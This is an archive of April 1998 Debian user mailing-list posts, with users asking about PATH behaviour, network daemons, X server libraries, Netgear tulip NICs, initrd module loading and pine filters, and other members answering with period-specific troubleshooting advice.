Unable to start program

1998-04-07 Thread Gabrie van Zanten
Hi,

Sometimes I see a program (I think) but I can't run it, even though I'm
using root. Like this one:
-rwxr-xr-x  XF86_S3V   2043768

I thought I could at least run it and get an error, but Linux says: command
not found. I had this too when installing fortune. After logging in as a
user I could run fortune, but not before as root (fortune was in the users
PATH, does it matter?).

Gabrie



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Where is telnet and ftp ?

1998-04-07 Thread Gabrie van Zanten
Hi,

Can I telnet and ftp to my own computer? I tried pinging 192.168.1.1 (which
is this computer) but a ftp will not log me in, and a telnet either ?

Do I have to start a special demon ? And how should I do that ?

Gabrie



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Xlib6g conflicts with X Win 3.3.2?

1998-04-07 Thread Oliver Elphick
Christopher J. McNicholas wrote:
  I installed a bunch of packages this weekend. Among them was Xlib6g.
  Now when I try to start X, I get the message:
  
  Can't load library libXmu.so.6
  
  What do I need to do to get X running again?
 
$ dpkg -S libXmu.so.6
xlib6g: /usr/X11R6/lib/libXmu.so.6.0
xlib6g: /usr/X11R6/lib/libXmu.so.6
xlib6: /usr/lib/libc5-compat/libXmu.so.6.0

You don't give much information, but I'm guessing that you're trying to run
a libc5-linked X program and it needs /usr/lib/libc5-compat/libXmu.so.6.0.

If that's the case, install xlib6.  

 
-- 
Oliver Elphick[EMAIL PROTECTED]
Isle of Wight  http://www.lfix.co.uk/oliver

PGP key from public servers; key ID 32B8FAA1



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Netgear 10/100tx nic

1998-04-07 Thread Bruce Dobrin
Hi all,

I'm trying to use a few netgear FA310TX 10/100 cards ('cause they're cheap!).  
Although they are based on the DEC 21140-AF chip (tulip) they don't seem to 
work well (or at all) with even the most recent tulip driver.  I tried a 
Genuine DEC nic (500tx) with a 21140 and it worked fine.  Anyone know of a 
driver that has been tweeked for the netgear?

Thanks!


Bruce Dobrin
Multi Media Dept.
Sony Pictures Imageworks
310-840-8412


My buddy got busted for counterfeiting.  He was making pennies.  They
caught him because he was putting the heads and tails on the wrong
sides.  He's in a minimum security prison now; he's on a whiffle-ball
and chain.
  -You Know Who


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


DECNET and Linux.

1998-04-07 Thread shaul
A friend of mine is considering connecting a Linux machine to a DECNET network.
Are there any www resorces, READMEs HOWTOs etc that are relevant ?
Is it considered something unusual ? 

Thank you.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Unable to start program

1998-04-07 Thread Bradley Bell
Gabrie van Zanten wrote:
 Sometimes I see a program (I think) but I can't run it, even though I'm
 using root. Like this one:
 -rwxr-xr-x  XF86_S3V   2043768
 
 I thought I could at least run it and get an error, but Linux says: command
 not found. I had this too when installing fortune. After logging in as a
 user I could run fortune, but not before as root (fortune was in the users
 PATH, does it matter?).

the root user does not have /usr/games (the location of 'fortune') or
. (the current directory) in it's PATH environment variable.  to use
them, you have to state the path explicitly.  e.g.:
/usr/games/fortune
or
./XF86_S3V

-brad


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: X configuration problem

1998-04-07 Thread Alain Toussaint
 Run xf86 config again.  When you get to the section that asks if the
 following displays resolutions are correct, pick a color depth to change
 and change/keep your existing resolutions but when asked if you want a
 virtual desktop select No.
 
 If you don't adjust your color-depths per resolution I believe that the
 script defaults to a Virtual Desktop.
 
 Hope this helps.

i did that (just reconfigured thing) but the problem is still there,i
seriously think that my graphic card dont support doublescan,i searched
the manual of my card but i've found nothing there.

Alain



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Unable to start program

1998-04-07 Thread Joost Kooij
On Tue, 7 Apr 1998, Gabrie van Zanten wrote:

 Hi,
 
 Sometimes I see a program (I think) but I can't run it, even though I'm
 using root. Like this one:
 -rwxr-xr-x  XF86_S3V   2043768
 
 I thought I could at least run it and get an error, but Linux says: command
 not found. I had this too when installing fortune. After logging in as a
 user I could run fortune, but not before as root (fortune was in the users
 PATH, does it matter?).

If its not in your $PATH, the shell won't find it. Unix, unlike dos, does
not automatically consider the current directory ( $PWD ) to be part of
$PATH, unless you explicitly set it so ( eg. add a dot to $PATH like so: 
export PATH=$PATH:. )

If you type ./commandname that will always work, because the shell sees an
absolute path prepended to the command, just like as if you had typed
/home/userx/somedir/command

Of course, the commandname file must have the execution bit set ( chmod +x
commandname )

Cheers,


Joost


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: pine

1998-04-07 Thread Colin Telmer
On Mon, 6 Apr 1998, Usman Roshan wrote:

 Hello everybody,  
  Does anyone know how to create filters in pine ? Thanks.

As other have mentioned, use procmail. This is a debian pacakge and along
with it is two other packages worth noting - procmail-lib, which is a
collection of useful procmail recipes and the dotfile generator procmail
module, which is a X gui to create a procmail recipe. I have never used
this last package as I found the examples in the procmail man pages
(procmail, procmailrc and procmailex or something like that) very helpful.
Its quite easy to set up. Cheers.


--
Colin Telmer, Ottawa, Ontario, Canada
mailto:[EMAIL PROTECTED]
http://www.telmer.com


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Threading list subjects?

1998-04-07 Thread Marco Anglesio


On Mon, 6 Apr 1998, Ray Schultz wrote:
 I am reading all these messages with Eudora 3.05 on a Win95 machine 
 and I don't think Eudora has a way to thread the subjects.

 Eudora does allow you to sort by subject, though. As for me, if there's a
subject that I particularly want to watch, I have procmail dump it into
its own folder; otherwise I just read from the top of my debian-user
folder.

m.

--
   [EMAIL PROTECTED]  Life is like a bad margarita with good tequila,
http://squawk.klue.on.ca  I thought, as I poured whiskey onto my granola
Running Debian Linux 2.0  and faced a new day.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: How to install linux

1998-04-07 Thread Quan Tran
Checkout the user document from Debian web site,
http://www.debian.org/doc/
There's an installation FAQ.

Christopher Kern wrote:
 
 Actually I am not a debian user, (yet) but I am hoping to become one soon with
 some help.  I have an old 486/50 that I want to install it on, but I have 
 never
 really used linux or unix so I am completely lost.  I have it (the 486)
 connected to my main computer with a serial link so I can load stuff that I
 download into it pretty easily, but when I looked at the debian FTP site there
 were so many files... which ones do I need?  Anyway, right now the 486 just 
 has
 command.com and the other essentials for dos on it.
 
 Thanks in advance,
 
 Chris.
 
 (please reply to [EMAIL PROTECTED])
 
 Full system details:
 
 IBM PS/2 486SLC2 50Mhz
 212 MB SCSI HDD
 8 MB RAM
 
 * Concord Academy, 166 Main Street, Concord, MA 01742 * 978.369.6080 *
 * http://www.concordacademy.org * [EMAIL PROTECTED]  *
 
 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Unable to start program

1998-04-07 Thread Daniel Martin at cush
Joost Kooij [EMAIL PROTECTED] writes:

 On Tue, 7 Apr 1998, Gabrie van Zanten wrote:
 
  Hi,
  
  Sometimes I see a program (I think) but I can't run it, even though I'm
  using root. Like this one:
  -rwxr-xr-x  XF86_S3V   2043768
  
  I thought I could at least run it and get an error, but Linux says: command
  not found. I had this too when installing fortune. After logging in as a
  user I could run fortune, but not before as root (fortune was in the users
  PATH, does it matter?).
 
 If its not in your $PATH, the shell won't find it. Unix, unlike dos, does
 not automatically consider the current directory ( $PWD ) to be part of
 $PATH, unless you explicitly set it so ( eg. add a dot to $PATH like so: 
 export PATH=$PATH:. )
 
 If you type ./commandname that will always work, because the shell sees an
 absolute path prepended to the command, just like as if you had typed
 /home/userx/somedir/command
SNIP

I should point out that it is considered a bad security idea to put
. (or in fact any directory name that doesn't begin with /) in
root's PATH.  If you're just wanting to do something one time, it
might be ok to do 'PATH=$PATH:.' as above but I wouldn't put that into
root's initialization files, or into the system-wide path.  (I should
qualify this with the statement that I don't completely understand why 
this is a security hole when it's done as the last component of the
PATH, but...)


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Emacs 19.34

1998-04-07 Thread William R. Ward

I am using the emacs package (19.34) and am finding that
increasingly there are more and more packages (e.g. pcl-cvs) that
depend on either emacs19 or emacs20 and for some reason the emacs
package doesn't provide emacs19 as I would expect it should.

--Bill.

-- 
William R Ward  Bay View Consulting   http://www.bayview.com/~hermit/
[EMAIL PROTECTED] 1803 Mission St. #339voicemail +1 408/479-4072
[EMAIL PROTECTED]   Santa Cruz CA 95060 USA   pager +1 408/458-8862
 PGP Key 0x2BD331E5; Public key at http://www.bayview.com/~hermit/pubkey.txt
-
Never doubt that a small group of thoughtful, committed citizens can change
 the world.  Indeed, it's the only thing that ever has. -- Margaret Mead


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


ckermit gone?

1998-04-07 Thread William R. Ward
Apparently ckermit is no longer provided - I believe it used to be in
either non-free or contrib.  Why is this?

--Bill.

-- 
William R Ward  Bay View Consulting   http://www.bayview.com/~hermit/
[EMAIL PROTECTED] 1803 Mission St. #339voicemail +1 408/479-4072
[EMAIL PROTECTED]   Santa Cruz CA 95060 USA   pager +1 408/458-8862
 PGP Key 0x2BD331E5; Public key at http://www.bayview.com/~hermit/pubkey.txt
-
Never doubt that a small group of thoughtful, committed citizens can change
 the world.  Indeed, it's the only thing that ever has. -- Margaret Mead


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


tm gone?

1998-04-07 Thread William R. Ward

What happened to the tm package (mail utilities for Emacs)?  It seems
to be gone from hamm now...

--Bill.

-- 
William R Ward  Bay View Consulting   http://www.bayview.com/~hermit/
[EMAIL PROTECTED] 1803 Mission St. #339voicemail +1 408/479-4072
[EMAIL PROTECTED]   Santa Cruz CA 95060 USA   pager +1 408/458-8862
 PGP Key 0x2BD331E5; Public key at http://www.bayview.com/~hermit/pubkey.txt
-
Never doubt that a small group of thoughtful, committed citizens can change
 the world.  Indeed, it's the only thing that ever has. -- Margaret Mead


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Where is telnet and ftp ?

1998-04-07 Thread Daniel Martin at cush
Gabrie van Zanten [EMAIL PROTECTED] writes:

 Hi,
 
 Can I telnet and ftp to my own computer? I tried pinging 192.168.1.1 (which
 is this computer) but a ftp will not log me in, and a telnet either ?
 
 Do I have to start a special demon ? And how should I do that ?

No, you just need to allow access.  By default, debian is set up to
deny access to machines it can't get a name for.  (You can see what
happened if you look at /var/log/daemon.log) You have at least
two options, then:

Add a line to /etc/hosts for every host that you will want to access
your machine from, something like this:
192.68.0.1  cushl.localnet cushl
192.68.0.2  wsw.localnet wsw

Or, you can change this default policy by commenting out the ALL:
PARANOID line in /etc/hosts.deny.  Then, any host will be able to
connect to your machine.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: ckermit gone?

1998-04-07 Thread Colin Telmer
On 6 Apr 1998, William R. Ward wrote:

 Apparently ckermit is no longer provided - I believe it used to be in
 either non-free or contrib.  Why is this?

I assume that it was removed from frozen due to outstanding bugs that were
not fixed before the freeze but should be back at some point. Don't quote
me on this however. 

Cheers, Colin.
--
Colin Telmer, Ottawa, Ontario, Canada
mailto:[EMAIL PROTECTED]
http://www.telmer.com


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Can't get my mouse to work

1998-04-07 Thread Dan Winkler
I've installed Debian 1.3.1 on my Gateway Pentium Pro and I can't get the
mouse to work.  I've received a lot of help from Rob Browning so I can
supply a lot of information but we have run out of ideas and could use some
help.  Here's what we know:

The mouse is a PS/2 mouse.  It works fine under Windows 95.  It does not
work at all under Linux.  When I run XF86Setup, I select PS/2 mouse and set
the device to be /dev/psaux and apply the changes, but moving the mouse
does not move the cursor.  The /dev/psaux file exists and looks right.  I
believe the kernel has PS/2 support included because in /var/log/messages
there's a line that says PS/2 Auxiliary pointing device detected -- driver
installed.  But in /proc/interrupts there's no mention of a PS/2 device or
a mouse.  I've also tried disabling both serial ports and the parallel port
in the BIOS to see if there was some IRQ conflict, but that made no
difference.

So... what should I try next?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


RE: Netgear 10/100tx nic, never mind...

1998-04-07 Thread Bruce Dobrin
I got it to work,  it was the fault of the HP Kayak,  not the driver...

Bruce Dobrin
Multi Media Dept.
Sony Pictures Imageworks
310-840-8412

Never hit your Grandma with a shovel, it leaves a bad impression on her 
mind
-Tiny Tim



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


runaway processors

1998-04-07 Thread Chris

Hi all,

I am having problems with user process's running away (taking up 99.8%
CPU time) on our linux server (primary examples being elvis and netscape).
Is there an easy way to get the server to recognise these - and kill them
off?  I know elvis runs away if you close the xterm (or window manager)
that elvis is running in - I haven't figured out the cause for the
others...

Thanks,

Chris


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: tm gone?

1998-04-07 Thread Ben Pfaff
   What happened to the tm package (mail utilities for Emacs)?  It seems
   to be gone from hamm now...

I think that no one ever updated it to the new standard for
emacs-related packages.  There is a much newer version available,
too.  I was going to work on it but I never got around to it.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Gateway, Proxy, DNS Help

1998-04-07 Thread Ben Szyc
I'm tryin to connect my Win95 and WinNT machines across why LAN through
a debian box and on to the NET. My debian box works fine on the net and
i can use Lynx. I feel it's got something to do with the way or where
i've configured my Gateway, DNS + Proxy server on all of my machines.
Also how do i make my debian machine a DNS server or is it already?

thanx (i really have no idea)


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: libXmu.so.6 ....THANK you

1998-04-07 Thread Christopher J. McNicholas
Thank you Mr. Elphick.
All I needed to do was install xlib6

It's always the simple things that inconvenience you, isn't it.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: DECNET and Linux.

1998-04-07 Thread shaul
 
 There was a Linux Journal article about this some months (years?) back. I
 think it was IKEA that had somehow managed to do this. I also notice a
 file in /usr/src/linux/net/decnet/README that says this:
 
 Yes.. it's being worked on.
  
 If you want to get involved email me [EMAIL PROTECTED] and I'll put you
 in touch with the people doing the work.

1) Who is IKEA ?
2) My 2.0.29 /usr/src/linux/net/decnet/README says the same. Maybee some newer 
kernels (perhaps  2.1.8x) has more info ?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Modem Help!!!

1998-04-07 Thread Brandon
Is there a way i can use my Zoom 56k flex external port 2...under linux.??
I use somethin like a 27 pin to 9 pin cable... thanx in advance...
Please also include what i need to configurewhat i need to change
etc...


my e-mail is [EMAIL PROTECTED]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


RE: Anyone got BTTV to work?

1998-04-07 Thread Orn E. Hansen

Þann 05-Apr-98 skrifar [EMAIL PROTECTED]:
 
 Hi!
 Works fine here with 2.0.32, X 3.3.2 , Matrox MilleniumII.
 I had some problems with X 3.3.1 (screen locked). ATI Mach 64 was also OK,
 S3 Trio64 was not. I guess you have a problem with your X-Server or Card. 
 Greetings, Ramin

  I was reading a disturbing document on the web the other day, about the
WinTV cards. That some of them have problems with the PCI chipsets on some
motherboards? and that there are situations where it just *won't* work?

  Any thoughts on this?


Orn Einar Hansen [EMAIL PROTECTED]
  [EMAIL PROTECTED]
voice+fax; +46 035 217194


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


What's latest libc5 Netscape?

1998-04-07 Thread Devin Wong
I get digest, so can't quote, but in a recent message it was explained
that Communicator 4.05 is libc6 and won't work with bo (as luck would have
it, I had 5.5 megs d/led over modem at that moment!).  I'm running bo;
what's the latest version I should be d/ling?  

Thanks in advance!

Devin

--
Reply-to: [EMAIL PROTECTED] 
http://www.engr.csulb.edu/~dbwong   




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


What do I need in initrd to load kernel modules? [long]

1998-04-07 Thread Jeremy Malcolm
-BEGIN PGP SIGNED MESSAGE-

I sent this yesterday, but I wasn't subscribed to the list at that
time so I am 90% sure the message didn't get through.  If it did, my
apologies.

Short version of question:
==
How do I load kernel modules from an initial ramdisk?

Long version of question:
=
This is a bit complicated (more so than appears from the short version
of the question above), so I hope you will bear with me.  I have a
parallel port SparQ drive which I want to install Debian 1.3.1 on, to
boot from my Windows NT laptop.  To get the kernel to recognise the
SparQ device I need to add the Parport modules to it
http://www.torque.net/linux-pp.html.

As my boot partition is going to be on the SparQ cartridge, obviously
I can't put the modules there.  Instead, I plan to put them on an
initial ramdisk (initrd).  The idea is that the kernel will load the
initrd image from a small FAT partition on my NT's hard drive and load
the modules from the ramdisk.  Having done that, it will be able to
recognise my SparQ media and continue booting from there.

Much of what I need to do I have already done, or know how to do.  For
example:

*   I have got the kernel modules that I need to access the SparQ drive,
and can insert these into the kernel using insmod from Linux on my
old DX-66.
*   I have copied a full Debian installation onto a SparQ cartridge from
my DX-66, and created a swap partition on it too.
*   I have made a FAT partition on my Windows NT machine to hold the
kernel, initrd image file and lilo boot sector, for use with the NT
boot loader.
*   I have set up lilo with the initrd option on my DX-66, and a test
linuxrc file is running from the ramdisk correctly.
*   I know how to include a proc filesystem on my initial ramdisk and to
change /proc/kernel/real_boot_device to point to my SparQ drive.
*   I know how to use mknod to create /dev/pda1 ... /dev/pda5 on my
initial ramdisk as the device files for the partitions on my SparQ
cartridge.

What I cannot seem to do is to get a shell script that loads the
kernel modules to run as linuxrc (ie. the file that automatically runs
from the initial ramdisk).  In fact, I can't get *anything* to run as
linuxrc, aside from the test linuxrc file referred to in the
documentation (a binary which prints out environment variables).  When
I use any other file as linuxrc, the kernel mounts the initial ramdisk
and then does one of three things, depending on how I have set up
lilo.conf:

(a) If I have specified root=/dev/hda3 (the root partition on my DX
66) in lilo.conf, mounts this file system and runs init, without
running linuxrc at all (apart from the test linuxrc referred to
above).  However I know that initrd has mounted properly, because it
is accessible in /initrd when the system has finished booting from my
hard disk.  I can also manually execute linuxrc from there.

(b) If I have specified root=/dev/pda1 in lilo.conf, I get a kernel
panic.  This indicates that the kernel modules to access the SparQ
drive have not been successfully loaded.  (As an aside, even the
*test* linuxrc file which works under (a) above, doesn't work when I
specify root=/dev/pda1, so it seems the kernel panic is occuring even
before the linuxrc file is normally executed.)

(c) If I have specified root=/dev/ram in lilo.conf, the kernel hangs
as soon as it has mounted linuxrc.  No kernel panic; it just hangs. 
(Again, interestingly, this hang seems to occur before the linuxrc
file would normally be executed, because even the test linuxrc file
that I can get to work under option (a) does not run when I specify
root=/dev/ram.)

The documentation suggests that *any* executable file can be run as
linuxrc, including shell scripts, but nothing I have tried (apart from
the test executable mentioned above) has worked.  For example, I have
tried using simple executables such as /bin/ash and /bin/ls as linuxrc
files, but to no avail.  I have also tried to run shell scripts as
linuxrc (also copying the appropriate shell to the initial ramdisk)
but with the same result.

I figured that the reason must be because my pseudo-root file system
does not have the correct files and libraries required by the linuxrc
files that I need to run.  The only files I have on my initrd file
system are insmod (to load the modules), a shell (to run any scripts),
/proc (so that I can change real_root_device), /dev (with a few files
such as ttys1 and pda1) and the modules themselves.  I don't know what
files *must* be in the root file system to enable an executable to run
or modules to be loaded, but apparently the files I have put there are
not enough.

Having concluded that this is the reason for my problem, I have tried
to create a proper root file system on my initrd in various ways. 
First, I have copied the initrd root file system that is created by
the Debian 1.3.1 rescue disk.  This works fine if I don't mess with it
(ie. the Debian 

Re: ATI 3D Rage Pro vx Xfree (and a comment)

1998-04-07 Thread Damir J. Naden
Hi Hogland, Thomas E.; unless Mutt is confused, you wrote:
 I know this can be done, but can't find the answer in the old digests...
 Have a Compaq Presario with the ATI 3D Rage Pro card. Installed from CD,
 set up X, used the listed Mach64 servers (for the Rage and Rage II) and
 X dies with the message that it can't start the server. The VGA setup
 comes up fine... Any ideas?? 

I'll assume you have a PCI card, but same info should apply to AGP based card:
upgrade the XFree86 package to the latest ( I think it is *_3.3.2-3.deb or
higher) and you should be fine...

HTH
damir


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Netgear 10/100tx nic

1998-04-07 Thread Ian Keith Setford

Yo-

 I'm trying to use a few netgear FA310TX 10/100 cards ('cause they're cheap!). 
  Although they are based on the DEC 21140-AF chip (tulip) they don't seem to 
 work well (or at all) with even the most recent tulip driver.  I tried a 
 Genuine DEC nic (500tx) with a 21140 and it worked fine.  Anyone know of a 
 driver that has been tweeked for the netgear?
I curently use this netgear card.  It is a great card because it is cheap
and uses the latest Digital Tulip chip.  I have recently upgraded to
frozen and it is working presently.  Prior to frozen I had a stable bo
system running.  I had no luck with this card until I upgraded to kernel
2.0.32 which contains the .79v of Donald's tulip driver in the kernel.
You must use at least kernel 2.0.32 and compile in support for the tulip
card.

Hope that helps.

-Ian   
_
Ian K. Setford  [EMAIL PROTECTED]
  H: 940.566.0461
Pgr: 817.901.0255


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: What's latest libc5 Netscape?

1998-04-07 Thread servis
On  6 Apr, Devin Wong wrote:
 I get digest, so can't quote, but in a recent message it was explained
 that Communicator 4.05 is libc6 and won't work with bo (as luck would have
 it, I had 5.5 megs d/led over modem at that moment!).  I'm running bo;
 what's the latest version I should be d/ling?  
 

The communicator 4.05 on netscapes ftp servers that is under the
shipping directories is libc5.  Under the development directories
is a libc6 version.  Keep downloading!  I couldn't get the netscape4
package installer to work because Netscape changed the tar ball format
but I just installed it using the builtin installer.

-- 
Brian 
-- 
Mechanical Engineering  [EMAIL PROTECTED]
Purdue University   http://www.ecn.purdue.edu/~servis


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: pine

1998-04-07 Thread Noah L. Meyerhans
-BEGIN PGP SIGNED MESSAGE-

On Mon, 6 Apr 1998, Usman Roshan wrote:

 Hello everybody,  
  Does anyone know how to create filters in pine ? Thanks.
 

I get the feeling that most, if not all of the people who
replied to this message mis-interpreted the question (but I guess I might
be...).  Pine does indeed offer filtering.  It's different than what
procmail does, but they still call it filtering.  If you open up the pine
configuration and scroll down a ways, you'll see a couple of options for
display-filters and sending-filters.  A good example of pine filters
is the pinepgp package, which automates pgp signing, key verification,
encryption, and decryption.  I used the attached filter, part of the
pinepgp package, to PGP sign this message.  I don't know anything about
how to write one, but, as you'll see by viewing the attachment, a pine
filter can be a simple shell script.  But I don't know which arguement
to the script is what.  I'd be willing to bet pine filter writing is
documented in the pine-docs package (the contents of which are
also available at ftp://ftp.cac.washington.edu/pine/docs.).

noah

  
  PGP public key available at
  http://lynx.dac.neu.edu/home/httpd/n/nmeyerha/mail.html
  or by 'finger -l [EMAIL PROTECTED]'




-BEGIN PGP SIGNATURE-
Version: 2.6.2

iQCVAwUBNSmXC4dCcpBjGWoFAQFTKwP9Fd+2g91VxKmW/jtsOFgbbo+DQsL33q1N
ME5EpkS619mDoDM2SuRnPfzZ+n1TgVq4KQRssz5yH6iLLX36n/z4fgcjqmVIwDkr
+EjsmQbmQn0b1qXY2HL5PGNG1tUZt7SnqXPXhnsQdscdob0XyLTN0MacTkwkTbou
VibvsoSAUgQ=
=EIvd
-END PGP SIGNATURE-
#!/bin/sh

TO=$2

#Check if we got the public key 
function check_key()
{
  RES=`pgp -kv $TO 21 | grep 0 matching keys found.`
  if [ ! -z $RES ]; then
echo
echo Can't find public key for $TO
echo -n Try a diffrent pgp user-id or press enter to abort: 
TO=`head -1`
if [ ! -z $TO ]; then
  check_key
fi
  fi
}

TMP=$1
TOS=
shift
for i in $*; do
  TO=$i
  check_key
  if [ -z $TO ]; then
exit -1
  fi
  TOS=$TOS $TO
done



if [ ! -z $TOS ]; then
  pgp -sea $TMP -o ~/.pgp/tmp.crypt $TOS
  mv ~/.pgp/tmp.crypt $TMP
else
  exit -1
fi


Installing on IBM Thinkpad 760E

1998-04-07 Thread Philip Jensen

Hello

I was hoping someone out there has had success installing Debin v1.3.1 onto an
IBM Thinkpad 760E.

The installations seems to go ok, but the machine simply does not boot.

Any help/instructions would be greatly appreciated.

many thanks

Philip Jensen
Internet mailto:[EMAIL PROTECTED]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


RE: dpkg: motifnls error

1998-04-07 Thread Ionut Borcoman
On Tuesday, April 07, 1998 1:56 AM, Gabrie van Zanten [SMTP:[EMAIL PROTECTED] 
wrote:
 1. I noticed on the CD I bought there is a dir called /bo/msdos-i3 full off
 *.deb files of 0 bytes. This must be a mistake, not ?

There's nothing wrong with those files. Actualyy, they're just links to the 
real files. If you look on your CD, you'll find in every directory a file named 
TRANS.TBL which keeps the corespondence between the long name of the file and 
its MSDOS name. Also, it is stated there if the file is a directory (D), link 
(L) or file (F). Under Linux, you'll see the CD with long names and links 
(somehow similar with Win95 shortcuts).

And a suggestion for those who maintain the Debian ftp sites: can you put a 
TRANS.TBL file in the non-free but which should have F instead of L. I say this 
for the following reason: at the office I have an Win95 machine with a CD 
burner. I can burn Joilet or ISO CDs, but not Linux CDs. When I download from 
msdos-i3 directory I get all the files that have links to them in msdos-i3. But 
they come with MSDOS names. If you'll put a TRANS.TBL with those MSDOS names 
and F in front of them I will we able to burn them on my CD using ISO. As I do 
not have Internet connection home (just e-mail), I have no other option to take 
non-free. (I have to agree that dselect is smart enough to find out which file 
contain which package even if you change the name of the file: I came to this 
conclusion after burning a Joilet CD which, under Linux and without Joilet 
patch, looks like Win95 files from DOS. But I'm not dselect 8-)).

Ionutz



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


RE: Threading list subjects?

1998-04-07 Thread Ionut Borcoman
Hi,

Just try the Netscape Comunicator. It's mail (and news) program can order the 
messages by thread . I was very pleased by that, especially some time ago when 
I have had access to some news groups.

Ionutz

On Monday, April 06, 1998 11:58 PM, Ray Schultz [SMTP:[EMAIL PROTECTED] wrote:
 Hello All,

 I am new to the list.  I have been on for only few days and already have
 75 messages from the list.  Great content!!

 I find it difficult to follow the subject threads without them being
 grouped together like a newsreader.
 I am reading all these messages with Eudora 3.05 on a Win95 machine
 and I don't think Eudora has a way to thread the subjects.

 How are all you guys handling the subject threading deal?

 --
 Ray Schultz,
 [EMAIL PROTECTED]
 http://www.coe.uh.edu/~rschultz/
 Some people are educated beyond their intelligence.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Hard Disk Size

1998-04-07 Thread Jaakko Niemi
 Hi,
 
 IIRC, as long as you keep your boot sector/partition within the lower 1024
 sectors of your hard drive you should be alright.  I've got a 9.1 GB SCSI
 drive that works fine with my Debian system.
 
 As a thought, if Linux couldn't handle large filesystems I don't anyone
 would have bothered implementing RAID for Linux.  :)

 It's already done. I'm running here with 2 0.5GB scsi disks as RAID-0
 with /var mounted there. Also something like 20+20mb swap partitions 
 on those drives - improves the systems responsivity a lot. 

 Take a look at the multiple-devices sections in kernel-configs. 

--j

 
 
 -Ossama
 
 __
 Ossama Othman [EMAIL PROTECTED]
 
 --- PGP Keys ---
 Public:  http://astrosun.tn.cornell.edu/staff/othman/OO_PUBLIC.asc
 REVOKED: http://astrosun.tn.cornell.edu/staff/othman/OO_REVOKED.asc
 
 
 
 --
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 






--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: dselect-ftp Question

1998-04-07 Thread Fabien Ninoles
On Mon, Apr 06, 1998 at 11:20:05AM -0600, Fulgham, Brent/SCO wrote:
   Is there a way to configure dselect-ftp to automatically retry
 downloading packages during an FTP error?
 
   For example, this weekend I did an install of hamm(frozen) using
 dselect-ftp.  Before bed I started things rolling, then went to sleep hoping
 I would have a whole distribution when I woke in the morning.
 Unfortunately, it had hung about half way through on a single file, asking
